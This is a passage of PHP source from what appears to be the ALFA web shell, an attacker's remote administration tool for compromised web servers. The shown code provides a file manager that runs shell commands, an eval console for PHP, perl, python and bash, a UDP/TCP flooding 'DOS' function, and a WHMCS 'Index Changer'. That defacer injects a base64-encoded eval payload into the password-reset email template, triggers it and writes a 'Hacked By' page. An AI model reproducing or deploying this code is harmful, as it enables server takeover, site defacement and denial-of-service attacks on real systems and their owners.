3294echo "<tr><td colspan=7>
3295<input type=hidden name=a value='FilesMan'>
3296<input type=hidden name=c value='".htmlspecialchars((isset($GLOBALS['glob_chdir_false'])?$_POST['c']:$GLOBALS['cwd']))."'>
3297<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
3298<select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>
3299<input type='submit' value=' '>
3300</form></table></div></div>";
3301alfafooter();
3302}
3303function alfaFilesTools(){
3304alfahead();
3305echo '<div class="filestools">';
3306if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
3307$alfa1_decoded = $_POST['alfa1'];
3308$chdir_fals = false;
3309if(!@chdir($_POST['c'])){
3310 $chdir_fals = true;
3311 $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
3312 $alfa_canruncmd = _alfa_can_runCommand(true,true);
3313 if($alfa_canruncmd){
3314 $slashed_alfa1 = addslashes($_POST['alfa1']);
3315 $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));
3316 $perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");
3317 }
3318}
3319if($_POST['alfa2'] == 'auto'){
3320if(is_array(@getimagesize($_POST['alfa1']))){
3321$_POST['alfa2'] = 'image';
3322}else{
3323 $_POST['alfa2'] = 'view';
3324 if($chdir_fals){
3325 if($alfa_canruncmd){
3326 $mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));
3327 $mimetype = $mime[1];
3328 if(!empty($mimetype)){
3329 if(strstr($mimetype, "image")){
3330 $_POST['alfa2'] = 'image';
3331 }
3332 }
3333 }
3334 }
3335}
3336}
3337if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}
3338if(@$_POST['alfa2'] == 'mkfile'){
3339$_POST['alfa1'] = trim($_POST['alfa1']);
3340if($chdir_fals&&$alfa_canruncmd){
3341 if(_alfa_is_writable($_POST["c"])){
3342 alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");
3343 $_POST['alfa2'] = "edit";
3344 }
3345}
3346if(!@file_exists($_POST['alfa1'])){
3347$fp = @fopen($_POST['alfa1'], 'w');
3348if($fp){
3349$_POST['alfa2'] = "edit";
3350fclose($fp);
3351}
3352}else{
3353$_POST['alfa2'] = "edit";
3354}
3355}
3356if(!_alfa_file_exists(@$_POST['alfa1'])){
3357echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('".$_POST['alfa4']."');</script>";
3358alfaFooter();
3359return;
3360}
3361if($chdir_fals){
3362$filesize = $file_info[3];
3363$uid["name"] = $file_info[1];
3364$gid["name"] = $file_info[2];
3365$permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);
3366}else{
3367$uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';
3368$gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';
3369if(!$uid&&!$gid){
3370$uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';
3371$gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';
3372}
3373$permcolor = alfaPermsColor($_POST['alfa1']);
3374$filesize = @filesize($_POST['alfa1']);
3375if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){
3376 if(_alfa_can_runCommand()){
3377 list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));
3378 }
3379}
3380}
3381echo '<span class="editor_file_info_vars">Name:</span> '.htmlspecialchars($alfa1_decoded).' <span class="editor_file_info_vars">Size:</span> '.alfaSize($filesize).' <span class="editor_file_info_vars">Permission:</span> '.$permcolor.' <span class="editor_file_info_vars">Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].' <span class="editor_file_info_vars">Directory:</span> '.str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']).'<br><br>';
3382if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';
3383if(!_alfa_is_dir($_POST['alfa1'])){
3384$m = array('View', 'Edit', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
3385$ftype = "file";
3386}else{
3387$m = array('Chmod', 'Rename', 'Touch');
3388$ftype = "dir";
3389}
3390foreach($m as $v)
3391echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\'):\'\';"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\')"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a>';
3392echo '<br><br>';
3393switch($_POST['alfa2']){
3394case 'view':
3395@chdir($_POST['c']);
3396echo '<div class="editor-view"><div class="view-content"><p><button style="border-radius:10px;" class="button" onClick="copyToClipboard(\'view_ml_content\');">copy to clipboard</button></p><pre class="ml1" id="view_ml_content">';
3397echo htmlspecialchars(__read_file($_POST['alfa1']));
3398echo '</pre></div></div>';
3399break;
3400case 'highlight':
3401@chdir($_POST['c']);
3402if(@is_readable($_POST['alfa1'])){
3403echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';
3404$code = @highlight_file($_POST['alfa1'],true);
3405echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div></div></div>';
3406}
3407break;
3408case 'delete':
3409@chdir($_POST['c']);
3410if(@is_writable($_POST['alfa1'])||isset($GLOBALS["glob_chdir_false"])){
3411$deleted = true;
3412if(!@unlink($_POST['alfa1'])){
3413 $deleted = false;
3414 if($alfa_canruncmd){
3415 if(_alfa_is_writable($_POST['alfa1'])){
3416 alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");
3417 $deleted = true;
3418 }
3419 }
3420}
3421if($deleted)echo 'File Deleted...<script>var elem = $("'.$_POST['alfa4'].'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["'.$_POST['alfa4'].'"];</script>';else echo 'Error...';}
3422break;
3423case 'chmod':
3424@chdir($_POST['c']);
3425if(!empty($_POST['alfa3'])){
3426$perms = 0;
3427for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)
3428$perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
3429if(!@chmod($_POST['alfa1'], $perms)){
3430if($chdir_fals&&$alfa_canruncmd){
3431alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");
3432echo('Success!');
3433}else{
3434echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';}
3435}else{echo('Success!');}
3436}
3437clearstatcache();
3438AlfaNum(8,9,10,7,6,5,4,2,1);
3439if($chdir_fals){
3440 $file_perm = $file_info[5];
3441}else{
3442 $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);
3443}
3444echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.chmod.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="chmod" value="'.$file_perm.'"><input type=submit value=" "></form>';
3445break;
3446case 'edit':
3447@chdir($_POST['c']);
3448if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){
3449echo 'File isn\'t writeable';
3450break;
3451}
3452if(!empty($_POST['alfa3'])){
3453$_POST['alfa3'] = substr($_POST['alfa3'],1);
3454$time = @filemtime($_POST['alfa1']);
3455$fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
3456if($chdir_fals&&$alfa_canruncmd){
3457 $rname = $alfa1_decoded;
3458 $randname = $rname.rand(111,9999);
3459 $filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;
3460 if($fp = @__write_file($filepath ,$_POST['alfa3'])){
3461 alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");
3462 }
3463}
3464if($fp){
3465echo 'Saved!<br><script>alfa3_="";</script>';
3466@touch($_POST['alfa1'],$time,$time);
3467}
3468}
3469echo '<button class="button" style="border-radius:10px;" onClick="copyToClipboard(\'edit_textarea_content\');">copy to clipboard</button><form id="editor_edit_area" onsubmit="editor(\''.addslashes($alfa1_decoded).'\',\''.$_POST['alfa2'].'\',\'1\'+this.text.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><p><input type="submit" value=" "></p><textarea name="text" id="edit_textarea_content" class="bigarea" onkeydown="saveByKey(event);">';
3470echo htmlspecialchars(__read_file($_POST['alfa1']));
3471echo '</textarea><p><input type="submit" value=" "></p></form>';
3472break;
3473case 'hexdump':
3474@chdir($_POST['c']);
3475$c = __read_file($_POST['alfa1']);
3476$n = 0;
3477$h = array('00000000<br>','','');
3478$len = strlen($c);
3479for ($i=0; $i<$len; ++$i) {
3480$h[1] .= sprintf('%02X',ord($c[$i])).' ';
3481switch ( ord($c[$i]) ) {
3482case 0: $h[2] .= ' '; break;
3483case 9: $h[2] .= ' '; break;
3484case 10: $h[2] .= ' '; break;
3485case 13: $h[2] .= ' '; break;
3486default: $h[2] .= $c[$i]; break;
3487}
3488$n++;
3489if ($n == 32) {
3490$n = 0;
3491if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
3492$h[1] .= '<br>';
3493$h[2] .= "\n";
3494}
3495}
3496echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table></div></div>';
3497break;
3498case 'rename':
3499@chdir($_POST['c']);
3500$alfa1_escape = addslashes($_POST["alfa1"]);
3501$alfa3_escape = addslashes($_POST["alfa3"]);
3502if(!empty($_POST['alfa3'])){
3503$cmd_rename = false;
3504if($chdir_fals&&$alfa_canruncmd){
3505if(_alfa_is_writable($_POST['alfa1'])){
3506$alfa1_escape = addslashes($alfa1_decoded);
3507alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");
3508}else{
3509$cmd_rename = true;
3510}
3511}else{
3512$alfa1_escape = addslashes($_POST["alfa1"]);
3513}
3514if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){
3515echo 'Can\'t rename!<br>';}else{echo('Renamed!<script>try{$("'.$_POST['alfa4'].'").innerHTML = "<div class=\'editor-icon\'>"+loadType(\''.$alfa3_escape.'\',\''.$ftype.'\',\''.$_POST['alfa4'].'\')+"</div><div class=\'editor-file-name\'>'.$alfa3_escape.'</div>";editor_files["'.$_POST['alfa4'].'"].file = "'.$alfa3_escape.'";d.files.innerHTML = d.files.innerHTML.replace(/\\\''.$alfa1_escape.'\\\'/g, "\''.$alfa3_escape.'\'");d.files.innerHTML = d.files.innerHTML.replace(/value\=\"'.$alfa1_escape.'\"/, \'value\=\"'.$alfa3_escape.'\"\');d.files.innerHTML = d.files.innerHTML.replace(/'.$alfa1_escape.'\<\/a\>/g, "'.$alfa3_escape.'</a>");d.files.innerHTML = d.files.innerHTML.replace(/Are You Sure For Delete # '.$alfa1_escape.' # \?/, "Are You Sure For Delete # '.$alfa3_escape.' # ?");'.($ftype == "dir"?"updateDirsEditor('".$_POST['alfa4']."','".$alfa1_escape."');":"").'}catch(e){console.log(e)}</script>');$alfa1_escape = $alfa3_escape;}
3516}
3517echo '<form onsubmit="editor(\''.$alfa1_escape.'\',\''.$_POST['alfa2'].'\',this.name.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="name" value="'.addslashes(htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$alfa1_decoded)).'"><input type=submit value=" "></form>';
3518break;
3519case 'touch':
3520@chdir($_POST['c']);
3521if( !empty($_POST['alfa3']) ) {
3522$time = strtotime($_POST['alfa3']);
3523if($time){
3524$touched = false;
3525if($chdir_fals&&$alfa_canruncmd){
3526 alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");
3527 $touched = true;
3528}
3529if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)
3530echo 'Fail!';
3531else
3532echo 'Touched!';
3533} else echo 'Bad time format!';
3534}
3535clearstatcache();
3536echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.touch.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST['alfa1']))).'"><input type=submit value=" "></form>';
3537break;
3538case 'image':
3539@chdir($_POST['c']);
3540echo('<hr>');
3541$file = $_POST['alfa1'];
3542$image_info = @getimagesize($file);
3543if(is_array($image_info)||$chdir_fals){
3544$width = (int)$image_info[0];
3545$height = (int)$image_info[1];
3546if($chdir_fals&&$alfa_canruncmd){
3547 $source = alfaEx("cat '".addslashes($file)."' | base64");
3548 list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));
3549 $mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));
3550 $image_info['mime'] = $mime[1];
3551}else{
3552 $source = __ZW5jb2Rlcg(__read_file($file, false));
3553}
3554$image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";
3555if($width > 800){$width = 800;}
3556echo $content = "<div class='editor-view'><div class='view-content'><center>".$image_info_h."<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:".$image_info['mime'].";base64,".$source."' alt='".$file."'></center></div></div><br>";
3557}
3558break;
3559}
3560echo '</div>';
3561alfaFooter();
3562}
3563function findicon($file,$type){
3564$s = 'http://solevisible.com/icons/';
3565$types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
3566if($type!='file'){
3567return ($file=='..'?$s.'back.png':$s.'folder.png');
3568}else{
3569$ext = explode('.',$file);
3570$ext = end($ext);
3571$ext = strtolower($ext);
3572return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');
3573}
3574}
3575function alfadlfile(){
3576if(isset($_POST['c'],$_POST['file'])){
3577$basename = rawurldecode(basename($_POST['file']));
3578$_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);
3579$alfa_canruncmd = _alfa_can_runCommand(true,true);
3580if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){
3581ob_start("ob_gzhandler", 4096);
3582header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");
3583header("Content-Type: application/octet-stream");
3584if(isset($GLOBALS["glob_chdir_false"])){
3585 $randname = $basename.rand(111,9999);
3586 $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
3587 $filepath = $scriptpath."/".$randname;
3588 if(_alfa_is_writable($scriptpath)){
3589 alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");
3590 readfile($filepath);
3591 @unlink($filepath);
3592 }else{
3593 alfaEx("cat '".addslashes($_POST["file"])."'");
3594 }
3595}else{
3596 readfile($_POST['file']);
3597}
3598}else echo('Error...!');}}
3599function alfaphpeval(){
3600alfahead();
3601if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){
3602echo '<div class=header>';
3603ob_start();
3604$INI=ini_get_all();
3605print '<table border=0><tr>'
3606.'<td class="listing"><font class="highlight_txt">Param</td>'
3607.'<td class="listing"><font class="highlight_txt">Global value</td>'
3608.'<td class="listing"><font class="highlight_txt">Local Value</td>'
3609.'<td class="listing"><font class="highlight_txt">Access</td></tr>';
3610foreach ($INI as $param => $values)
3611print "\n".'<tr>'
3612.'<td class="listing"><b>'.$param.'</td>'
3613.'<td class="listing">'.$values['global_value'].' </td>'
3614.'<td class="listing">'.$values['local_value'].' </td>'
3615.'<td class="listing">'.$values['access'].' </td></tr>';
3616$tmp = ob_get_clean();
3617$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
3618$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
3619echo str_replace('<h1','<h2', $tmp) .'</div><br>';
3620}
3621if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
3622echo '<div class=header><style>.p {color:#000;}</style>';
3623ob_start();
3624phpinfo();
3625$tmp = ob_get_clean();
3626$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
3627$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
3628echo str_replace('<h1','<h2', $tmp) .'</div><br>';
3629}
3630if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
3631echo '<div class=header>';
3632ob_start();
3633$EXT=get_loaded_extensions();
3634echo '<table border=0><tr><td class="listing">'.implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT).'</td></tr></table>'.count($EXT).' extensions loaded';
3635echo '</div><br>';
3636}
3637$lang_html = "";
3638foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '<option value="'.$key.'" '.($_POST["alfa3"]==$key?"selected":"").'>'.$val.'</option>';}
3639echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">'.$lang_html.'</select><br><br><textarea placeholder="file_get_contents(\'/etc/passwd\');" name=code class=bigarea id=PhpCode>'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):'').'</textarea><center><input type="submit" value="" style="margin-top:5px"></center>';
3640echo '</form><pre id=PhpOutput style="'.(empty($_POST['alfa1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
3641if(!empty($_POST['alfa1'])){
3642if($_POST['alfa3']=="php"){
3643ob_start();
3644eval($_POST['alfa1']);
3645$result = htmlspecialchars(ob_get_clean());
3646}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){
3647 if(isset($_SESSION["eval_tmpdir"])){
3648 $tempdir = $_SESSION["eval_tmpdir"];
3649 }else{
3650 $tempdir = dirname(alfaEx("mktemp"));
3651 $_SESSION["eval_tmpdir"] = $tempdir;
3652 }
3653 $lang = $_POST['alfa3'];
3654 $filename = "temp".rand(11111,99999);
3655 $temp = $tempdir."/".$filename ;
3656 __write_file($filename, $_POST['alfa1']);
3657 $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
3658 @unlink($filename);
3659 @unlink($temp);
3660}
3661echo '<textarea class=bigarea id="PhpCode">'.$result.'</textarea>';
3662}
3663echo '</pre></div>';
3664alfafooter();
3665}
3666function alfahash(){
3667if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
3668if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
3669$stringTools = array(
3670'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',
3671'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',
3672'strrev ( $string )' => 'strrev($s)',
3673'bin2hex ( $string )' => 'bin2hex($s)',
3674'hex2bin ( $string )' => 'hex2bin($s)',
3675'md5 ( $string )' => 'md5($s)',
3676'sha1 ( $string )' => 'sha1($s)',
3677'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',
3678'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',
3679'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',
3680'crypt ( $string )' => 'crypt($s)',
3681'crc32 ( $string )' => 'crc32($s)',
3682'str_rot13 ( $string )' => 'str_rot13($s)',
3683'urlencode ( $string )' => 'urlencode($s)',
3684'urldecode ( $string )' => 'urldecode($s)',
3685'full_urlencode ( $string )' => 'full_urlencode($s)',
3686'htmlspecialchars ( $string )' => 'htmlspecialchars($s)',
3687'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',
3688'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',
3689'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',
3690'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',
3691'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',
3692'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',
3693);
3694alfahead();
3695echo '<div class=header>';
3696echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
3697foreach($stringTools as $k => $v)
3698echo "<option value='".htmlspecialchars($v)."' ".($_POST['alfa1']==$v?'selected':'').">".$k."</option>";
3699echo "</select> <input type='submit' value=' '/><br><textarea name='input' style='margin-top:5px' class='bigarea'>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form>";
3700if(!empty($_POST['alfa1'])){
3701$string = addslashes($_POST['alfa2']);
3702$string = str_replace('\"','"',$string);
3703$alg = $_POST['alfa1'];
3704$code = str_replace('$s',"'".$string."'",$alg);
3705ob_start();
3706eval('echo '.$code.';');
3707$res = ob_get_contents();
3708ob_end_clean();
3709if(in_array($alg, $stringTools))echo '<textarea class="bigarea" id="PhpCode">'.htmlspecialchars($res).'</textarea>';
3710}
3711echo "</div>";
3712alfaFooter();
3713}
3714function alfados(){
3715alfahead();
3716echo '<div class=header>';
3717echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';
3718if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){
3719echo __pre();
3720$packets=0;
3721ignore_user_abort(true);
3722$exec_time=(int)$_POST['alfa2'];
3723$time=time();
3724$max_time=$exec_time+$time;
3725$host=$_POST['alfa1'];
3726$port=(int)$_POST['alfa3'];
3727$method=$_POST['alfa4'];
3728$out = str_repeat('X',65000);
3729while(1){
3730$packets++;
3731if(time() > $max_time){
3732break;
3733}
3734$fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
3735if($fp){
3736fwrite($fp, $out);
3737fclose($fp);
3738}
3739}
3740echo "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";
3741echo "</pre>";
3742}
3743echo '</div>';
3744alfafooter();
3745}
3746function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');}
3747function alfaIndexChanger(){
3748alfahead();
3749
3750echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
3751if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){
3752echo __pre();
3753
3754echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
3755<p><center>".getConfigHtml('whmcs')."<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">
3756";
3757$table = array('td1' =>
3758 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
3759 'td2' =>
3760 array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
3761 'td3' =>
3762 array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),
3763 'td4' =>
3764 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
3765 'td5' =>
3766 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
3767 'td6' =>
3768 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
3769);
3770create_table($table);
3771echo "<br><div class='txtfont'>| Your Index |</div><br>
3772<textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
3773<input type='submit' value=' '>
3774</form></center></center>";
3775if(isset($_POST['alfa6'])){
3776$s0levisible="Powered By Solevisible";
3777$dbu = $_POST['alfa6'];
3778$path = $_POST['alfa5'];
3779$fname = $_POST['alfa4'];
3780$dbn = $_POST['alfa7'];
3781$dbp = $_POST['alfa8'];
3782$dbh = $_POST['alfa9'];
3783$index = $_POST['alfa10'];
3784$index = str_replace("\'","'",$index);
3785$deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';
3786$saveData = __ZW5jb2Rlcg($deface);
3787$Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';
3788if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
3789$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
3790$soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
3791$soleGet = mysqli_fetch_assoc($soleSave);
3792$tempSave1 = $soleGet['message'];
3793$tempSave = str_replace("'","\'",$tempSave1);
3794$inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
3795$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));
3796$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
3797$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));
3798if(function_exists('curl_version')){
3799$AlfaSole = new AlfaCURL(true);
3800$saveurl = $AlfaSole->Send($path."/pwreset.php");
3801$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
3802$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
3803$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
3804$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
3805__alert('File Created...');
